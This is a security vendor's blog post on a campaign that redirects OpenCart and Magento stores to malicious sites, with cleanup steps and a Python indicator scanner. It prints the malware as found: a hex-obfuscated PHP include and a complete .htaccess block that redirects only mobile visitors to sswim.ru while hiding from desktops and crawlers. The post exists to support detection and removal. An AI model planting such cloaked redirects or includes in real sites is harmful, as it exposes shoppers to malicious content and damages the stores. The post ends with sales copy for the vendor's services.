OpenCart & Magento websites redirecting to malware sites

An OpenCart and Magento malware that redirects both desktop and mobile visitors to malicious links has been making the rounds. Since last week we have handled several cases of it. No specific versions are being targeted: we have seen the infection across a wide range of both Magento and OpenCart releases.

Also see our detailed blog post on the different types of malicious redirection and how to fix them.

How Does the Infection Look?

Ahead of the Black Friday and Cyber Monday sales, this malware redirects anyone who visits an infected store to a third-party site: sometimes one carrying discount offers, sometimes one with graphic, porn-style content. One of the customers who came to us had managed to remove parts of the malware from the desktop site, but the redirect persisted on mobile. When the redirect fires, the visitor never sees the store at all and lands directly on one of these sites.

Consequences of Redirection Malware:

  • Visitors redirected to malicious websites
  • Negative effect on search results
  • Spike in 404 pages created by the malware
  • Errors and warnings in Google Search Console (Webmaster Tools)
  • More malicious files appearing on the server
  • Decrease in traffic and sales as a result of all the above

How to Find & Fix this OpenCart & Magento Website Redirection Spam:

The steps below may tell you to delete pieces of code. However, attackers often make malicious code look legitimate, so before deleting any file or code, take a full backup (files and database) so that a mistake can be rolled back. Below are the steps to find and fix the infection:

  • Check the index.php file: We found malicious code injected at the top of the OpenCart index.php. The malicious part is a single @include whose path is written entirely in PHP hex escapes (\xNN), so it is hard to tell what it loads without decoding it; the escapes resolve to an absolute path inside the site's own public_html directory, and the included file carries the actual payload. The leading @ suppresses the warning PHP would otherwise emit if that file were missing, and the /*2e920*/ comments mark the start and end of the injected block. Here's a snippet:
    <?php
    /*2e920*/
    
    // Injected by the attacker: the hex escapes hide the path of the real
    // payload, and the @ silences errors if that file has since been removed.
    @include "\x2fh\x6fm\x65/\x6ez\x67a\x72d\x65n\x2fp\x75b\x6ci\x63_\x68t\x6dl\x2fs\x79s... [[MALICIOUS CODE]]";
    
    /*2e920*/
    // Stock OpenCart 2.0.1.0 index.php resumes from here
    // Version
    define('VERSION', '2.0.1.0');
    
    // Configuration
    if (is_file('config.php')) {
        require_once('config.php');
    }
    
    // Install
    if (!defined('DIR_APPLICATION')) {
        header('Location: install/index.php');
        exit;
    }
    
    // Startup
    require_once(DIR_SYSTEM . 'startup.php');
    
    // Registry
    $registry = new Registry();

    If you find this block (everything between the two /*2e920*/ markers) at the top of your index.php, delete it, then decode the hex path and remove the file it points to as well; the rest of the file is stock OpenCart and should stay.

  • Be sure to check .htaccess: Another piece of the malware lives in the .htaccess files on your server. Check the one in the web root as well as the one in the /admin folder. A snippet from the malware found in the /admin folder:
    
    RewriteEngine on
    RewriteCond %{HTTP_USER_AGENT} android [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} opera\ mini [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} blackberry [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} iphone [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} (pre\/|palm\ os|palm|hiptop|avantgo|plucker|xiino|blazer|elaine) [NC,OR]
    RewriteCond %{HTTP_USER_AGENT} (iris|3g_t|windows\ ce|opera\ mobi|windows\ ce;\ smartphone;|windows\ ce;\ iemobile) [NC,OR]
    RewriteCond %{HTTP:Accept} (text\/vnd\.wap\.wml|application\/vnd\.wap\.xhtml\+xml) [NC,OR]
    RewriteCond %{HTTP:Profile} .+ [NC,OR]
    RewriteCond %{HTTP:Wap-Profile} .+ [NC,OR]
    RewriteCond %{HTTP:x-wap-profile} .+ [NC,OR]
    RewriteCond %{HTTP:x-operamini-phone-ua} .+ [NC,OR]
    RewriteCond %{HTTP:x-wap-profile-diff} .+ [NC]
    RewriteCond %{QUERY_STRING} !noredirect [NC]
    RewriteCond %{HTTP_USER_AGENT} !^(Mozilla\/5\.0\ \(Linux;\ U;\ Android\ 2\.2;\ en-us;\ Nexus\ One\ Build/FRF91\)\ AppleWebKit\/533\.1\ \(KHTML,\ like\ Gecko\)\ Version\/4\.0\ Mobile\ Safari\/533\.1\ offline)$ [NC]
    RewriteCond %{HTTP_USER_AGENT} !(windows\.nt|bsd|x11|unix|macos|macintosh|playstation|google|yandex|bot|libwww|msn|america|avant|download|fdm|maui|webmoney|windows-media-player) [NC]
    RewriteRule ^(.*)$ http://sswim.ru [L,R=302]
    

    Everything shown above is malicious. The RewriteCond lines match mobile browsers by User-Agent and by WAP-related request headers, skip requests that carry noredirect in the query string or that come from desktop, bot and crawler user agents, and the final RewriteRule sends every remaining request to http://sswim.ru with a 302. Because desktop visitors and search engine bots are excluded, the store looks normal to its owner and to Google while phones are redirected, which matches the desktop-clean, mobile-infected case described above. If you find these rules, remove them immediately and restore the stock .htaccess for your CMS version.

  • Look for fishy PHP files: This is the tricky part. Attackers give their files legitimate-looking names and often pad them with harmless code so that only a couple of lines do the real work. In this case we found files such as enjoy.php and unzip.php in various OpenCart and Magento directories; unzip.php was an uploader that let the attacker place further malicious files on the server. Compare the file list against a clean copy of the same CMS version and look at modification times around the date the redirect started.
  • Webmasters don't lie: Google Search Console (Webmaster Tools) warns you when its crawler notices something suspicious while indexing the site, and if Google is warning you, you should worry, because this is the point at which search rankings take a hit. We saw the same thing with the Japanese SEO spam campaign, which is still going around. In this case Search Console also surfaced the flood of 404 pages this malware generated, so check the Crawl Errors report as part of the cleanup.
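To make the checks above repeatable across a whole document root, here is an added example in Python. It is not code from the original post or from OpenCart or Magento: it looks for include/require statements whose path is hidden behind PHP hex escapes (and decodes them), for RewriteRule targets in any .htaccess that point at a host other than your own, and for PHP files whose names match the droppers seen here or that call move_uploaded_file(). The host name shop.example, the sample file contents and the move_uploaded_file() heuristic are assumptions for the example; the Search Console check has no local equivalent and is left out.

```python
# Added example (not from the original post): scan an OpenCart/Magento document root
# for the indicators above: hex-escaped include paths, .htaccess redirects to a
# foreign host, and PHP files flagged by suspicious name or by upload handling.
# Host names and sample inputs below are constructed for the example.
import os
import re
from typing import List, Set

# File names reported in the post; extend with anything not in a clean install.
SUSPICIOUS_NAMES = {"unzip.php", "enjoy.php"}
# include/require with a double-quoted literal, e.g. @include "\x2fh\x6fm\x65...";
INCLUDE_RE = re.compile(r'@?\b(?:include|require)(?:_once)?\b\s*\(?\s*"([^"]*)"')
HEX_ESC_RE = re.compile(r"\\x([0-9a-fA-F]{2})")
# RewriteRule whose target is an absolute URL; group 2 is the host part.
REWRITE_RULE_RE = re.compile(r"^\s*RewriteRule\s+\S+\s+(https?://([^/\s]+)\S*)", re.I | re.M)
UA_COND_RE = re.compile(r"^\s*RewriteCond\s+%\{HTTP_USER_AGENT\}", re.I | re.M)

def decode_php_hex_escapes(literal: str) -> str:
    """Resolve PHP \\xNN escapes so the obfuscated include path becomes readable."""
    return HEX_ESC_RE.sub(lambda m: chr(int(m.group(1), 16)), literal)

def scan_php_source(path: str, text: str) -> List[str]:
    """Return findings for one PHP file; an empty list means nothing suspicious."""
    findings: List[str] = []
    for m in INCLUDE_RE.finditer(text):
        literal = m.group(1)
        if "\\x" in literal:  # a real path has no reason to be spelled in hex escapes
            findings.append(f"{path}: hex-obfuscated include of {decode_php_hex_escapes(literal)}")
    if os.path.basename(path).lower() in SUSPICIOUS_NAMES:
        findings.append(f"{path}: file name matches a dropper seen in this campaign")
    if "move_uploaded_file(" in text:  # assumption: uploader logic outside the CMS is a web shell smell
        findings.append(f"{path}: accepts file uploads; confirm it belongs to the CMS")
    return findings

def scan_htaccess(path: str, text: str, own_hosts: Set[str]) -> List[str]:
    """Flag RewriteRule redirects to hosts the shop does not own."""
    findings: List[str] = []
    ua_gated = bool(UA_COND_RE.search(text))  # same block also tests the User-Agent?
    for m in REWRITE_RULE_RE.finditer(text):
        target, host = m.group(1), m.group(2).lower()
        if host not in own_hosts:
            gate = "user-agent-gated " if ua_gated else ""
            findings.append(f"{path}: {gate}redirect to external host {host} ({target})")
    return findings

def scan_tree(root: str, own_hosts: Set[str]) -> List[str]:
    """Walk a document root and apply both scanners to every .htaccess and .php file."""
    findings: List[str] = []
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            full = os.path.join(dirpath, name)
            try:
                with open(full, encoding="utf-8", errors="ignore") as fh:
                    text = fh.read()
            except OSError:
                continue
            if name == ".htaccess":
                findings += scan_htaccess(full, text, own_hosts)
            elif name.lower().endswith(".php"):
                findings += scan_php_source(full, text)
    return findings

# Constructed samples: an injected index.php header (path differs from the post's),
# a trimmed copy of the post's mobile-redirect rules, and clean equivalents.
SAMPLE_INDEX_PHP = r'''<?php
/*2e920*/
@include "\x2fh\x6fm\x65/\x73i\x74e\x2fp\x75b\x6ci\x63_\x68t\x6dl\x2fs\x79s\x2fx.php";
/*2e920*/
define('VERSION', '2.0.1.0');
'''
CLEAN_INDEX_PHP = "<?php\ndefine('VERSION', '2.0.1.0');\nrequire_once('config.php');\n"
SAMPLE_HTACCESS = """RewriteEngine on
RewriteCond %{HTTP_USER_AGENT} android [NC,OR]
RewriteCond %{HTTP_USER_AGENT} iphone [NC]
RewriteCond %{QUERY_STRING} !noredirect [NC]
RewriteRule ^(.*)$ http://sswim.ru [L,R=302]
"""
CLEAN_HTACCESS = """RewriteEngine On
RewriteCond %{HTTP_HOST} ^www\\.shop\\.example$ [NC]
RewriteRule ^(.*)$ https://shop.example/$1 [L,R=301]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteRule ^([^?]*) index.php?_route_=$1 [L,QSA]
"""

if __name__ == "__main__":
    for line in scan_php_source("index.php", SAMPLE_INDEX_PHP) + scan_htaccess(
            "admin/.htaccess", SAMPLE_HTACCESS, {"shop.example"}):
        print(line)
```

On a real store, call scan_tree("/path/to/docroot", {"yourshop.tld", "www.yourshop.tld"}) and review every line it returns against a clean copy of the same CMS version. The output is a list of things to inspect, not a verdict: a legitimate extension may use move_uploaded_file(), and a clean scan does not prove the absence of other backdoors.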

Here's what you can do from here:

Infections like these hit a business hard: every hour of downtime costs customers and reputation, and the damage to search engine rankings lasts longest. After infecting a site, attackers tend to leave behind backdoors that are hard to detect even for tech-savvy owners, so removing the visible redirect alone is not a cleanup. Take a lesson from hacks like these and put a website firewall in front of your store that protects it 24x7x365!

For now, if you need help fixing this mess, we'll be happy to do it for you. Just sign up here and our engineers will begin the cleanup within 10 minutes of your signing up.



About The Author

Shikhil plays on the line between security and marketing. When not thinking about how to make Astra super simple, Shikhil can be found enjoying alternative rock or a game of football.

4 Comments

  1. 20 Must-Know Hack Terminologies To Safeguard Your Online Business from Hackers - Astra Web Security Blog

    […] instance, a recent malware functioned by redirecting both Opencart and Magento desktop and mobile websites to malicious links. […]

  2. Detailed Guide on Website Malware Attacks: Causes, Consequences & Steps to Fix - Astra Web Security Blog

    […] Looking for malicious code in your index.php, searching for unwanted php files in core CMS files and checking your webmasters search console are the key things here. A more elaborate guide on how to deal with redirection issue can be found here. […]

  3. How to identify and secure Joomla admin security?

    […] in the database when you log in, or weird behavior such as when you visit your site and then it redirects you to a different […]

  4. Magento Hacked: These Magento Vulnerabilities Can Be The Cause

    […] The site appears to be infected with malicious redirects. […]
